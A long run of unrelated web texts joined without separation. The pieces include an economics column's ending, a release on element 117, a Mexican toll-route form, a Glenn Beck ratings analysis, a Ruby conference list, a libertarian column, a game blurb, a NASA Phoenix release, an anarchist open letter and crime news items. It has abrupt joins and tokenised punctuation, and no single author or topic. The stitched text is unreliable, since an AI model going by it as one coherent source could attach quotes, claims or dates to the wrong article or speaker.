This money went to bail out distressed banks and financial institutions which used it to profit from global “ carry trade ” speculation , as hot money that exploited interest rate arbitrage trades between economies .
The toxic debts have remained in the global economy at face value , having only been transformed from private debts to public debts to prevent total collapse of the private sector .
The debt bubble has been turned into a dense debt black hole of intense financial gravity the traps all lights from appearing at the end of the recovery tunnel .
Much criticism by mainstream economists in the US has been focused on the controversial bailout of “ too - big - to - fail ” financial institutions that have continued to effectively resist critically needed regulatory reform by holding the seriously impaired economy hostage .
Some critics have complained that government stimulus packages are too small for the task at hand .
Only a few lonely voices have focused on public spending being directed at wrong targets .
Yet such massive public spending has left many economies around the world with looming sovereign debt crises .
For more , please visit HenryCKLiu.com .
Roosevelt Institute Braintruster Henry C.K.
Liu is an independent commentator on culture , economics and politics .
An international team of scientists from Russia and the United States , including two Department of Energy national laboratories and two universities , has created the newest superheavy element , element 117 .
The lifetime of element 117 , which has now been created in the lab for the first time , confirms that superheavy elements lie in an island of stability on the periodic table .
The team included scientists from the Joint Institute of Nuclear Research ( Dubna , Russia ) , the Research Institute for Advanced Reactors ( Dimitrovgrad ) , Lawrence Livermore National Laboratory , Oak Ridge National Laboratory , Vanderbilt University , and the University of Nevada , Las Vegas .
" The discovery of element 117 is the culmination of a decade - long journey to expand the periodic table and write the next chapter in heavy element research , " said Academician Yuri Oganessian , scientific leader of the Flerov Laboratory of Nuclear Reactions at JINR and spokesperson for the collaboration .
The team established the existence of element 117 from decay patterns observed following the bombardment of a radioactive berkelium target with calcium ions at the JINR U400 cyclotron in Dubna .
The experiment depended on the availability of special detection facilities and dedicated accelerator time at Dubna , unique isotope production and separation facilities at Oak Ridge , and distinctive nuclear data analysis capabilities at Livermore .
" This is a significant breakthrough for science , " LLNL director George Miller said .
" The discovery of a new element provides new insight into the makeup of the universe and is a testimony to the strength of science and technology at the partner institutions . "
" This collaboration and the discovery of element 117 demonstrates the fundamental importance of scientists from different nations and institutions working together to address complex scientific challenges , " ORNL Director Thom Mason added .
advertisement
The two - year experimental campaign began at the High Flux Isotope Reactor in Oak Ridge with a 250 - day irradiation to produce 22 mg of berkelium .
This was followed by 90 days of processing at Oak Ridge to separate and purify the berkelium , target preparation at Dimitrovgrad , 150 days of bombardment at one of the world 's most powerful heavy ion accelerators at Dubna , data analysis at Livermore and Dubna , and assessment and review of the results by the team .
The entire process was driven by the 320 - day half - life of the berkelium target material .
The experiment produced six atoms of element 117 .
For each atom , the team observed the alpha decay from element 117 to 115 to 113 and so on until the nucleus fissioned , splitting into two lighter elements .
In total , 11 new " neutron - rich " isotopes were produced , bringing researchers closer to the presumed " island of stability " of superheavy elements .
The island of stability is a term in nuclear physics that refers to the possible existence of a region beyond the current periodic table where new superheavy elements with special numbers of neutrons and protons would exhibit increased stability .
Such an island would extend the periodic table to even heavier elements and support longer isotopic lifetimes to enable chemistry experiments .
Element 117 was the only missing element in row seven of the periodic table .
On course to the island of stability , researchers initially skipped element 117 due to the difficulty in obtaining the berkelium target material .
The observed decay patterns in the new isotopes from this experiment , as close as researchers have ever approached the island of stability , continue a general trend of increasing stability for superheavy elements with increasing numbers of neutrons in the nucleus .
This provides strong evidence for the existence of the island of stability .
" It fills in the gap and gets us incrementally closer than element 116 -- on the edge of the island of stability , " said Ken Moody , one of the LLNL collaborators and a long term veteran of superheavy element research .
" The experiments are getting harder , but then I thought we were done 20 years ago . "
This discovery brings the total to six new elements discovered by the Dubna - Livermore team ( 113 , 114 , 115 , 116 , 117 , and 118 , the heaviest element to date ) .
This is the second new element discovery for Oak Ridge ( 61 and 117 ) .
In addition , Oak Ridge isotopes have contributed to the discovery of a total of seven new elements .
Since 1940 , 26 new elements beyond uranium have been added to the periodic table .
" These new elements expand our understanding of the universe and provide important tests of nuclear theories , " said Vanderbilt University Professor of physics Joe Hamilton .
" The existence of the island of stability , a pure theoretical notion in the 1960s , offers the possibility of further expansion of the periodic table with accompanying scientific breakthroughs in the physics and chemistry of the heaviest elements . "
The research will appear in a forthcoming issue of the journal Physical Review Letters and will be the focus of a Viewpoint article by Sigurd Hofmann ( Helmholtz Centre for Heavy Ion Research ) to appear in APS Physics ( http://physics.aps.org/).
- video encodings still in process -
Passes Between The Moon And Us .
I ’ve been working on this one for over a month .
I do n’t know why it took so long .
It does n’t look like it took that long .
I am happy it ’s got Allison ’s brother Spencer Kelly .
I ’ve got a bunch of stories in mind for him .
SELECCION English Version Para obtener una ruta , seleccione primero el estado y la ciudad de origen , después el estado y ciudad de destino y por último el tipo de vehículo en el que viajará .
Si desea añadir puntos intermedios ( opcional ) , a la ruta se procede como en el caso anterior ; en este caso es necesario que la ciudad Intermedia sea distinta de la de Origen y Destino .
Estado origen : Seleccionar Aguascalientes Baja California Baja California Sur Campeche Coahuila Colima Chiapas Chihuahua Distrito Federal Durango Guanajuato Guerrero Hidalgo Jalisco México Michoacán Morelos Nayarit Nuevo León Oaxaca Puebla Querétaro Quintana Roo San Luis Potosí Sinaloa Sonora Tabasco Tamaulipas Tlaxcala Veracruz Yucatán Zacatecas Estado destino : Seleccionar Aguascalientes Baja California Baja California Sur Campeche Coahuila Colima Chiapas Chihuahua Distrito Federal Durango Guanajuato Guerrero Hidalgo Jalisco México Michoacán Morelos Nayarit Nuevo León Oaxaca Puebla Querétaro Quintana Roo San Luis Potosí Sinaloa Sonora Tabasco Tamaulipas Tlaxcala Veracruz Yucatán Zacatecas Ciudad origen : Sin resultados Ciudad destino : Sin resultados
Si requiere agregar puntos intermedios en la ruta : Click aquí Tarifas de : Seleccionar Todos Automóviles Autobuses Camiones Motocicleta Camión 3 ejes Camión 4 ejes Camión 5 ejes Camión 6 ejes Camión 7 ejes Camión 8 ejes Camión 9 ejes Automóvil Automóvil remolque 1 eje Automóvil remolque 2 eje Pick Ups Autobus 2 ejes Autobus 3 ejes Autobus 4 ejes Camión 2 ejes Solución simplificada , ( con tramos libres resumidos )
Solución detallada
Si requiere conocer gasto estimado de combustible : Click aquí NOTA IMPORTANTE : Los datos que se presentan en este sitio son de carácter meramente informativo y tienen el exclusivo objeto de proporcionar a un usuario de la red nacional de carreteras , información aproximada al tiempo , distancia y costos ( peaje y combustibles ) , que tendrá un recorrido determinado .
Las distancias son aproximadas y pueden cambiar en cualquier momento como resultado de la inclusión al sistema de carreteras adicionales ( federales , estatales o municipales ) , o bien como consecuencia de la revisión y ajuste de las existentes .
Los tiempos de recorrido también son aproximados , se calculan considerando que el vehículo a utilizar es un automóvil y no se toman en cuenta detenciones de ninguna clase ; suponen velocidades constantes y condiciones óptimas de manejo y pueden variar como consecuencia de la modificación de la ruta o por ajustes a las velocidades actualmente asignadas a cada tramo .
Por lo anterior la SECRETARÍA DE COMUNICACIONES Y TRANSPORTES no asume responsabilidad por la exactitud de la información aquí presentada ni por los usos distintos del informativo que terceros hagan de ella , así como tampoco por errores u omisiones que pudieran ocurrir en este sitio .
Su consulta es la No. 132829402
Yesterday , for some reason or another , I was curious to see how Glenn Beck had been doing in the ratings department ... so I collected the ratings for each and every one of his TV broadcasts since the premiere of his show on Fox in January , 2009 .
Next , I calculated the average audience size for each week that the show has been on the air , and put the numbers into a chart .
( To be fair and balanced , I excluded the weeks of the Thanksgiving , Christmas , and New Year 's holidays , each of which artificially depressed Beck 's numbers . )
The chart revealed something of a surprise : since Glenn Beck 's ratings peak during the week ending January 22 ( the week of Beck 's special " Revolutionary Holocaust : Live free or die " broadcast ) , Beck 's ratings have been on a steep slide , dropping nearly 50 % .
In fact , last week , Beck averaged less than 2 million viewers for the first time since the middle of July .
He did take vacation for part of the week , but his ratings were still lower than during previous vacations .
If you factor out his vacation , Beck probably has a solid , dependable audience in the range of 2.6 million .
Those numbers are decent , but they hardly represent a meteoric rise from the 2.25 million or so that he averaged in his show 's first few months .
He 's managed to deliver some impressive spikes in his audience , but he generally has n't held those spikes .
To the extent that Beck 's baseline audience has grown , it essentially mirrors Fox 's overall growth .
In other words , Beck may not be the ratings machine most think he is .
I 'm not saying Beck has peaked .
Remember , first and foremost Glenn Beck sees himself as a showman and he 'll stop at nothing to boost ratings .
Beck is a swing - for - the - fences kind of guy , and so far he 's generally connected , delivering impressive short - term spikes in his audience .
But just like a product that goes on sale too often , there 's a limit to the number of swings
Beck can take before he cheapens the value of his broadcast .
As Beck continues to take big swings , he 's going to end up having more shows like his disastrous Eric Massa interview .
As that happens , the audience is going to start seeing Beck as a ratings whore , and that will erode his authenticity -- and the trust they have in him .
The catch - 22 for Beck is that if he does n't continue to take big swings , his audience will grow bored as he says the same thing over and over .
So he 's going to need to keep on pushing the envelope -- putting his brand at risk while he does it .
Either way , at some point , Glenn Beck 's career will look like that of Morton Downey Jr. , who exploded onto the scene in the 1980s , imploding before the decade was out .
I do n't know how close we are to that point .
But one day , the moment will come .
And when it does come , Beck wo n't have peaked -- he 'll have crashed .
He 's unsustainably foolish , and things that are n't sustainable just do n't last .
( The raw numbers used to create this chart are here .
I gathered them from mediabistro.com 's TVNewser . )
There are an incredible amount of Ruby & Rails conferences coming up in the next 6 months .
See below to find one in your neck of the woods .
March 11 - 12 – MountainWest RubyConf in Salt Lake City , UT , USA
Cost : 100 USD
March 12 - 15 – Rails Camp New England in West Greenwich , RI , USA
Cost : 150 USD
March 20 - 21 – RubyConf India in Bangalore , India
Cost : 1000 INR
March 26 - 27 – Scottish Ruby Conference in Edinburgh , Scotland
Cost : 195 GBP
April 9 - 10 – Ruby Nation in Reston , VA , US
Cost : 259 USD
April 16 - 19 – RailsCamp Canberra in Canberra Australia
Cost : 210 AUD
April 17 – Great Lakes Ruby Bash in Lansing , MI , USA
Cost : ?
April 25 – RubyConf Taiwan in Taipei , Taiwan
Cost : 400 TWD
April 30 – ArrrrCamp # 3 in Ghent , Belgium
Cost : Free
May 6 - 7 – Red Dirt RubyConf in Oklahoma City , OK , USA
Cost : ?
May 7 – Frozen Rails in Helsinki , Finland
Cost : 99 EUR
May 21 - 23 – Nordic Ruby in Gothenburg , Sweden
Cost : ?
May 22 – GoRuCo in New York , NY
Cost : ?
May 29 - 30 – Euruko in Krakow , Poland
Cost : ?
May 31 - June 2 – RailsWayCon in Berlin , Germany
Cost : 699 EUR
June 7 - 10 – RailsConf in Baltimore , MD , USA
Cost : $ 695
July 16 - 17 – Ruby Midwest in Kansas City , MO
Cost : $ 75
August 21 – RS on Rails in Porto Alegre , Brazil
Cost : R60
August 26 - 28 – Lone Star Ruby Conference in Austin , TX , USA
Cost : ?
August 27 - 29 – Ruby Kaigi in Tsukuba , Ibaraki , Japan
Cost : ?
If I missed any ( or have any information wrong ) feel free to leave a comment and I ’ll add it to the post .
FYI , I ’m purposely only showing conferences in the next 6 months .
I ’ll do another post in 6 months to show additional ones .
By John Stossel - April 7 , 2010
I used to be a Kennedy - style " liberal . "
Then I wised up .
Now I 'm a libertarian .
But what does that mean ?
When I asked people on the street , half had no clue .
We know that conservatives want government to conserve traditional values .
They say they 're for limited government , but they 're pro-drug war , pro-immigration restriction and anti-abortion , and they often support " nation - building . "
And so - called liberals ?
They tend to be anti-gun and pro-choice on abortion .
They favor big , powerful government -- they say -- to make life kinder for people .
By contrast , libertarians want government to leave people alone -- in both the economic and personal spheres .
Leave us free to pursue our hopes and dreams , as long as we do n't hurt anybody else .
Ironically , that used to be called " liberal , " which has the same root as " liberty . "
Several hundred years ago , liberalism was a reaction against the stifling rules imposed by aristocracy and established religion .
I wish I could call myself " liberal " now .
But the word has been turned on its head .
It now means health police , high taxes , speech codes and so forth .
So I can't call myself a " liberal . "
I 'm stuck with " libertarian . "
If you have a better word , please let me know .
When I first explained libertarianism to my wife , she said : " That 's cruel !
What about the poor and the weak ?
Let them starve ? "
I recently asked some prominent libertarians that question , including Jeffrey Miron , who teaches economics at Harvard .
" It might in some cases be a little cruel , " Miron said .
" But it means you 're not taking from people who 've worked hard to earn their income ( in order ) to give it to people who have not worked hard . "
But is n't it wrong for people to suffer in a rich country ?
" The number of people who will suffer is likely to be very small .
Private charity ... will provide support for the vast majority who would be poor in the absence of some kind of support .
When government does it , it creates an air of entitlement that leads to more demand for redistribution , till everyone becomes a ward of the state . "
Besides , says Wendy McElroy , the founder of ifeminists.com , " government aid does n't enrich the poor .
Government makes them dependent .
And the biggest hindrance to the poor ... right now is the government .
Government should get out of the way .
It should allow people to open cottage industries without making them jump through hoops and licenses and taxing them to death .
It should open up public lands and do a 20th - century equivalent of 40 acres and a mule .
It should get out of the way of people and let them achieve and rise . "
David Boaz , executive vice president of the Cato Institute , took the discussion to a deeper level .
" Instead of asking , ' What should we do about people who are poor in a rich country ? '
The first question is , ' Why is this a rich country ? ' ...
" Five hundred years ago , there were n't rich countries in the world .
There are rich countries now because part of the world is following basically libertarian rules : private property , free markets , individualism . "
Boaz makes an important distinction between equality and absolute living standards .
" The most important way that people get out of poverty is economic growth that free markets allow .
The second - most important way -- maybe it 's the first -- is family .
There are lots of income transfers within families .
Third would be self - help and mutual - aid organizations .
This was very big before the rise of the welfare state . "
This is an important but unappreciated point : Before the New Deal , people of modest means banded together to help themselves .
These organizations were crowded out when government co-opted their insurance functions , which included inexpensive medical care .
Boaz indicts the welfare state for the untold harm it 's done in the name of the poor .
" What we find is a system that traps people into dependency .
...
You should be asking advocates of that system , ' Why do n't you care about the poor ? ' "
I agree .
It appears that when government sets out to solve a problem , not only does it violate our freedom , it also accomplishes the opposite of what it set out to do .
Blosics 2
Blosics 2 : Satisfy your destructive urges
There is something about a neatly stacked pile of blocks that unleashes our primal instinct for destruction .
Whether it is stepping on a carefully constructed sandcastle or blowing on an artfully designed house constructed out of playing cards , people like to obliterate things .
Who can honestly walk by a Jenga tower and say that they do n’t feel compelled to knock it all over the table ?
Blosics 2 is a game that allows you to satisfy all of your destructive urges .
Feel free to take out your frustrations on inanimate blocks .
The concept of Blosics is simple .
Pull a ball out of the ball summoning area , aim it at the blocks , and fire .
The resultant collision will send the blocks flying through the air .
As you progress through Blosic , the challenge increases .
You will have to hit certain blocks while avoiding others .
The texture of surfaces can change to become slippery or rubbery .
Obstacles will align themselves between the balls and the blocks .
Your arsenal consists of various sized balls .
Select the size that you want for either pinpoint precision or maximum devastation .
Use the mouse to control your shot .
You launch the balls by drawing your mouse away from the target and releasing .
The ball takes off as though shot from a slingshot and wrecks the neat stacks .
Gravity will take care of the rest .
One carefully placed shot from a ball will set forth a brilliant chain of disruption that will continue long after the ball has ceased to move .
Play Blosics 2 >>
Military otaku dredge the depths of their weird weapon folders for the ultimate in “ hentai weaponry , ” covering everything from swords and firearms to aircraft and armor .
Weapons included range from obvious Photoshops to actual military projects which make the obvious Photoshops look sensible …
F -X ( Stealth Jet )
Translation :
Missile used : Sea Sparrow RIM - 7M Maximum Range :
It flies well ( CLASSIFIED DEFENCE SECRET )
Sustained firing rate : Lots ( CLASSIFIED DEFENCE SECRET )
Accuracy :
It hits a lot ( CLASSIFIED DEFENCE SECRET )
Typically , when we get wind of a new handset hitting the FCC ’s website , we may get a few sketches of the battery compartment , showing off where the FCC ’s label will appear .
Today , things are a bit different .
The HTC PC70110 has just appeared on the site , along with a few pictures which give us a pretty clear idea of what the new handset will look like .
If you have been holing out for a good replacement for the HTC Dream , the HTC PC70110 will most likely be your handset of choice .
The images reveal a four row QWERTY keyboard which looks identical to the keyboard on the HTC Touch Pro2 .
There are four capacitive buttons located under the screen ( home , menu , back , and search ) and what appears to be an optical joystick .
The FCC documentation also reveals that the HTC PC70110 has support for AT&T ’s 850/1900 MHz bands .
At this point , it looks like At&t customers may actually get a decent Android phone within the next few months .
If you are at all familiar with the Touch Pro2 , you know that it is the best QWERTY keyboard experience on Windows Mobile .
I ’m actually surprised it has taken HTC this long to bring it over to the Android side .
Source : FCC
Power Struggle in Turkey Is Erdogan Strong Enough to Take on the Generals ?
Last week 's arrest of military brass amid allegations of a plot against the Turkish government have dealt a serious blow to the country 's secular elite .
But some are asking if Prime Minister Erdogan has bitten off more than he can chew .
NASA to Check for Unlikely Winter Survival of Mars Lander
PASADENA , Calif . -- Beginning Jan. 18 , NASA 's Mars Odyssey orbiter will listen for possible , though improbable , radio transmissions from the Phoenix Mars Lander , which completed five months of studying an arctic Martian site in November 2008 .
The solar - powered lander operated two months longer than its three - month prime mission during summer on northern Mars before the seasonal ebb of sunshine ended its work .
Since then , Phoenix 's landing site has gone through autumn , winter and part of spring .
The lander 's hardware was not designed to survive the temperature extremes and ice - coating load of an arctic Martian winter .
In the extremely unlikely case that Phoenix survived the winter , it is expected to follow instructions programmed on its computer .
If systems still operate , once its solar panels generate enough electricity to establish a positive energy balance , the lander would periodically try to communicate with any available Mars relay orbiters in an attempt to reestablish contact with Earth .
During each communications attempt , the lander would alternately use each of its two radios and each of its two antennas .
Odyssey will pass over the Phoenix landing site approximately 10 times each day during three consecutive days of listening this month and two longer listening campaigns in February and March .
" We do not expect Phoenix to have survived , and therefore do not expect to hear from it .
However , if Phoenix is transmitting , Odyssey will hear it , " said Chad Edwards , chief telecommunications engineer for the Mars Exploration Program at NASA 's Jet Propulsion Laboratory , Pasadena , Calif .
" We will perform a sufficient number of Odyssey contact attempts that if we do n't detect a transmission from Phoenix , we can have a high degree of confidence that the lander is not active . "
The amount of sunshine at Phoenix 's site is currently about the same as when the lander last communicated , on Nov. 2 , 2008 , with the sun above the horizon about 17 hours each day .
The listening attempts will continue until after the sun is above the horizon for the full 24.7 hours of the Martian day at the lander 's high - latitude site .
During the later attempts in February or March , Odyssey will transmit radio signals that could potentially be heard by Phoenix , as well as passively listening .
If Odyssey does hear from Phoenix , the orbiter will attempt to lock onto the signal and gain information about the lander 's status .
The initial task would be to determine what capabilities Phoenix retains , information that NASA would consider in decisions about any further steps .
Mars Odyssey is managed for NASA 's Science Mission Directorate by JPL , a division of the California Institute of Technology in Pasadena .
Lockheed Martin Space Systems , Denver , is the prime contractor for the project and built the spacecraft .
The successful Phoenix mission was led by Peter Smith of the University of Arizona , Tucson , with project management at JPL and development partnership at Lockheed Martin .
International contributions came from the Canadian Space Agency ; the University of Neuchatel , Switzerland ; the universities of Copenhagen and Aarhus in Denmark ; the Max Planck Institute in Germany ; the Finnish Meteorological Institute ; and Imperial College , London .
Media contact : Guy Webster 818-354-6278
Jet Propulsion Laboratory , Pasadena , Calif .
guy.webster@jpl.nasa.gov
2010-008
Mi Yodeya is a question and answer site for those who base their lives on Jewish law and tradition and anyone interested in learning more .
It only takes a minute to sign up .
The Politics of Impatience :
An open letter from anarchists to the anarchist movement
The Politics of Impatience :
An open letter from anarchists to the anarchist movement
Dear friends ,
As anarchists from a variety of different projects and political perspectives , mostly in the U.S. , we are inspired by the courage of students fighting for access to public universities in New York , California , and everywhere .
At a time when politicians take money out of schools and build prisons to fill with young people of color and poor people – while giving away trillions to the banks , health insurance companies , and war profiteers – any movement that takes back space and resources for public use wins our hearts .
Many of us are not students , but we will continue to demonstrate our solidarity in whatever ways we can when students are beaten and arrested , and colleges themselves start to look like jails because administrations are afraid of the power of student organizing .
We are shocked that on March 4th at Hunter College , City University of New York ( CUNY ) , some anarchists harmfully disrupted a protest against tuition hikes , budget cuts , and childcare cuts .
Some of the facts of what happened are in dispute .
Some are not , including the following : A faculty member and longtime media activist was injured in the head , sectarian graffiti was spray - painted , and a parent from Defend Hunter Childcare was targeted with a sexist epithet that was heard by some as a rape threat .
Some of the individuals involved have apologized for their actions .
But we still need to ask why this happened , how anarchists could be responsible for these things .
And how to make sure it never happens again .
At the root of the incident was an impatience by some anarchists with a rally and walkout that they decided should have been an occupation .
This letter will talk about the politics of impatience and offer some ideas for action .
A movement that stands for childcare , healthcare , and education for everyone means more to most people than slogans shouted by those who are “ pushed by the violence of our desires ” to act as individuals .
A statement with that phrase as its title , written by some folks involved in the altercation at Hunter , claims , “ We do not need the ‘ consent of the people . ’”
But militant direct action needs to take place within the context of a movement , not outside of it .
To single - handedly declare that a protest is not radical enough without participating in the democratic processes of the movement is vanguardist .
It ’s ironic -- and tragic -- when it comes from anarchists .
When we want to occupy , let ’s reach out to those who might want to occupy too , so there ’s a chance they might occupy with us .
Peace to the villages , war to the palaces
We are deeply frustrated with the lack of militant resistance across the U.S. while the powers that be are murdering millions of people with impunity , transferring our wealth to the richest , and destroying the planet .
In many areas , the only options being offered are lobbying , actions pre-determined by media - savvy advocacy nonprofit staff , and grassroots campaigns that only demand what they believe to be immediately “ winnable ” from local , state , or federal governments .
We ’ve all felt the transformation and possibility that resonates in the air at more spontaneous mass protests where , however briefly , the streets or the schools are truly ours .
If that moment of freedom can also feed the bellies and minds of people ’s children , people will do it again , and more will be inspired to try it on their own terms .
Learning our movements ’ histories can give us a few ideas .
CUNY , for example , has a tremendous militant history of student occupations , which were organized very carefully with massive popular support -- not just from the students , but from the Black and Latino neighborhoods most of them came from .
In 1969 , when the police started arresting students occupying CUNY campuses across the city , community members brought food for the protesters , standing between them and police .
This is because the students were part of those communities , and their tactics , strategy , and message were connected to so many people ’s lives .
Those lengthy occupations , which involved the burning of an auditorium , won Open Admissions – meaning that by 1976 , the student body was majority working - class people of color from New York City public high schools .
Many of these students took the opportunity to spend years studying their communities ’ revolutionary histories and putting those lessons into action .
At CUNY , occupations as a winning tactic continued through the 70s and 80s .
These occupations ’ strategic use of demands has been a defining feature of successful revolutionary movements , in this country and around the world , for centuries .
It is no less vital in these days of crisis .
Picture the Homeless , a current New York City grassroots organization founded and led by homeless people , write collectively in the January / February 2009 issue of Left Turn magazine , “ If we spend all of our time on a campaign to fix the shelter system , we ’ll never get around to fighting the tyranny of the housing market .
Reforms can be steps on the road to revolution when we use them that way .
Also revolution is a process itself , which is n’t over when the smoke dies down .
In the best of all worlds , reform can help us figure out what the revolution will look like – if we use the process of winning reform to illuminate what it is that we want and what it is going to take to get it . ”
[ Click here for a pdf of this article . ]
For Sparks to Fly
Militancy and dramatic tactics require trust , and trust is built by humbly listening to people who have their own ideas and plans for their liberation .
It is now more than ever , exactly because of the urgency of the crisis created by capitalism , that we need to be careful that our actions are as respectful , strategic , and collectively discussed and agreed - on as possible .
“ Confrontational approaches are bound to encounter opposition at some point , but if the opposition is coming from potential comrades , it ’s a warning sign that one is on the wrong path , ” CrimethInc. Ex- Workers ’ Collective write in “ Say You Want an Insurrection . ”
We ’ve heard about a few events in the past few years where anarchist groups have disrupted other groups ’ events .
There are times when the only way to get a vital message across is to do things that people will say are disruptive .
We value a diversity of tactics and ideas , and we do n’t want this statement to be used to stifle dissent .
But collective liberation is going to be a long struggle , and we will need to get along with people of different backgrounds and ideas .
Hunter College in particular has a long history of anarchists , communists , socialists , Black and Puerto Rican nationalists and other radicals working together .
This is never easy , but it is something to be proud of .
The urgency of crisis will not make these challenges go away .
If we are serious about revolutionary social change , then we need to have more open conversations with those we disagree with , instead of blasting each other on the internet .
Conflict is a part of life that we can often learn a lot from , but only when we are open to hearing criticism and learning from our mistakes .
A Vision that Beckons
As anarchist Ashanti Omowali Alston said in a speech at Hunter College in 2003 , “ How can we nurture every act of freedom ?
Whether it is with people on the job or the folks that hang out on the corner , how can we plan and work together ? ”
Toni Cade Bambara , a Black feminist ( and CUNY activist ) said that “ the job of the writer is to make revolution irresistible . ”
That ’s our job too .
Our movements need to offer what the system never can : dignity , solidarity , freedom , and honesty .
We sign this letter to say that as anarchists :
We want a free world .
We respect the human dignity of other people fighting for freedom , even when we disagree .
We take militant action rooted in collective , voluntary , democratic participation .
We make time for open discussion and decision - making .
We respect the self - determination of oppressed groups and learn from these struggles .
We reject attacks by anarchists on movements they decide are not “ militant ” enough .
We imagine new ways to build the loving , liberatory communities we want to live in while we resist and attack the forms of domination we live under now .
In solidarity ,
[ Note : Projects and organizations are listed along with people ’s names for identification only and do n’t imply endorsement by that group .
Groups that sign on collectively are marked with an asterisk . ]
Suzy Subways , SLAM Herstory Project , Prison Health News writing collective , Philadelphia
Joel Olson , Bring the Ruckus and Repeal Coalition
Zachary Hershman , Coalition for Essential Services Philadelphia , former SDS member
Jasper Conner , IWW , Southern Appalachian Mountain Stewards , Appalachia VA
Chris Dixon , Sudbury Against War and Occupation & Upping the Anti , Sudbury , Ontario
cindy , doris ’zine
Daniela Sea
Sara R. Galindo , Los Angeles ( A ) Bookfair Collective , UCLA Graduate Student
Jamie McCallum , the CUNY Graduate center
Mitchell Verter , author , Dreams of Freedom : A Ricardo Flores Magon Reader ( AK Press )
Michelle O’Brien
laurel smith , POWER : Parents Organizing for Welfare and Economic Rights .
Olympia , WA
Samantha Sitrin , ACT UP Philadelphia
Corina Dross
Arthur J. Miller , Tacoma GMB - Industrial Workers of the World , Co-Editor : Bayou La Rose , anarchist for over 40 years , Tacoma , WA
Ruth Sheridan , Alaskans for Peace and Justice , Anchorage
dave onion
* Team Colors Collective
Nicole Davis , DC IWW , DC SDS
Lydia Pelot - Hobbs , North American Students of Cooperation ( NASCO ) , New Orleans , LA
Chris Borte , creating democracy , Portland , OR
Peter Bohmer
Brendan Maslauskas Dunn , Olympia WA
Steven Araujo , ( Graduate ) Student Organizing Committee at UC Santa Cruz , United Auto Workers local 2865 Santa Cruz
Alexis Shotwell , Sudbury Against War and Occupation
Paul Messersmith - Glavin , Institute for Anarchist Studies , Perspectives on Anarchist Theory journal collective , IWW - Portland , Parasol Climate Collective , Red and Black Cafe , Portland
Walter Hergt , Black Sheep Books
Luis Fernandez , Bring the Ruckus and Repeal Coalition
Colin Cascia , a member of the defenestrator collective
Andrew Willis Garcés
James Generic , part of the Wooden Shoe collective
Crescenzo Scipione , Rochester SDS , IWW
Marina Sitrin , San Francisco Bay Area , author of Horizontalism : Voices of Popular Power in Argentina
Dan Berger , author of Outlaws of America : The Weather Underground and the Politics of Solidarity , cofounder of Onward newspaper ( 2000 - 2003 )
David Stein , Critical Resistance - Los Angeles
Jon Berger , College Park SDS & the Civilian - Soldier Alliance
Sara Skinner , DC
Alex Knight , endofcapitalism.com
Dana Barnett , Philadelphia PA
scott p , the defenestrator collective
Roy San Filippo , Editor , A New World in Our Hearts : 8 Years of Writings from the Love and Rage Revolutionary Anarchist Federation
Joseph Lapp , IWW , Alaskans Together for Equalitity
Tara Lindsey , educator , Denver
Stephen Polk , student and community activist , Denver
Mary Witlacil , Denver Food Not Bombs
luce guillen - givins
Clare Bayard , Catalyst Project
Chris Crass , Catalyst Project
layne mullett
germ ross , Marginal Notes Collective and former member of Philly SDS
Sarah Small , Marginal Notes Collective , Coalition to Save the Libraries , political prisoner support work
Jade Gleaner , Co-director The Mill Creek Farm
For more information and views on what happened at Hunter :
• “ Open Letter to the Student Movement , ” signed by a named list of Hunter student , faculty , and alumni activists .
The many letters in solidarity with the Hunter activists ’
Open Letter , including one by anarchists at Hunter who helped organize the walkout , are not publicly available , except for this one by CUNY activist lawyer Ron McGuire .
• A blog called “ Take the City ” hosts several unsigned writings opposed to the Open Letter , including “ A Response to the Lies of March 4th ” and “ Pushed by the Violence of Our Desires ”
• Video from the rally ( first posted by Take the City )
Some ideas and histories to check out :
• SLAM Herstory Project http://slamherstory.wordpress.com/
Some history of radical CUNY student organizing
• “ Between Infoshops and Insurrection : U.S. Anarchism , Movement Building , and the Racial Order ” by Joel Olson http://jan.ucc.nau.edu/~jo52/pubs/Anarchism and Race-public.pdf
• “ Smack Bad Politics , Abolish the White Race ” by Sam Emm
http://www.bringtheruckus.org/?q=node/91
• “ Black Fighting Formations ” by Russell Maroon Shoats
http://www.akpress.org/2005/items/blackfightingformations
A short history and analysis of armed Black groups , 1960 – 94 , from the imprisoned Black Panther
• “ Promissory Notes : from Crises to Commons ” by Midnight Notes Collective and Friends http://www.midnightnotes.org/Promissory%20Notes.pdf
• Upping the Anti - a radical journal of theory and action http://www.uppingtheanti.org/
• Turbulence newspaper – ideas for movement http://turbulence.org.uk/
A raging cyclist fed up with aggressive Manhattan drivers took matters into his own hands yesterday , jumping on the hood of a limo that clipped him and smashing in the windshield with his fists .
Bike messenger - gone - wild Perzeus Forte , 20 , also ripped out the front passenger window , tore the shirt of driver Darr Mohammed , 49 , and clocked him in the face during the savage road rage attack around 1 p.m. , sources said .
“ He hit me and kept going , ” Forte later fumed to The Post .
“ I ’m sick of this . ”
Forte ’s rampage began while riding his bike up Sixth Avenue in Chelsea , where Mohammed grazed him around West 19th Street .
The limo kept going until he got stopped by a red light at West 20th Street .
That ’s when Forte flipped out , ditching his wheels and sprinting 100 yards to the car .
He leaped onto the hood while screaming , “ I ’m going to kill you !
I ’m going to kill you , motherf- – - er ! ” according to one witness .
“ He was running like he was possessed .
I just could n’t believe how mad he was , ” said Mohammed , who was on his way to a job in Midtown .
“ I swear to God I thought I was a dead man , ” the shaken Mohammed said .
“ He was going to kill me . ”
Forte crushed the windshield with his two open palms while repeatedly shouting , “ I ’m going to kill you !
Get out of the car ! ” the witness said .
The belligerent biker then jumped off the hood and grabbed the half - open driver ’s - side window , shaking it back and forth until it shattered , the witness said .
Forte allegedly socked Mohammed in his left eye and ripped the breast pocket of his blue dress shirt .
Mohammed , who lives in Bayonne with his wife and daughter , suffered a black eye .
“ I was not going to leave my car .
He would have ripped my head off , ” Mohammed said .
“ This has never happened to me .
I have a family at home . ”
Fellow bikers peddled up to Forte and calmed him down before he could do further damage , according to sources .
He then turned his attention to his blood - soaked hands , plucking out shards of glass while waiting for the cops .
Even though Mohammed did n’t want to press charges , Forte was arrested on charges of misdemeanor assault and harassment .
He was given a desk appearance ticket to return to court at a later date .
“ This will cost me about a thousand [ dollars ] , ” Mohammed said .
“ I ’m just glad to be alive . ”
kirsten.fleming@nypost.com
' Medical mafia ' don pleads guilty
LAS VEGAS ( Fortune ) --
A medical consultant accused of orchestrating a conspiracy among top Las Vegas doctors and lawyers to inflate personal injury settlements by many millions of dollars , has pleaded guilty to concealing knowledge of a felony , a charge known as misprision .
The consultant , Howard Awand , 65 , faces up to three years in prison and a $ 250,000 fine .
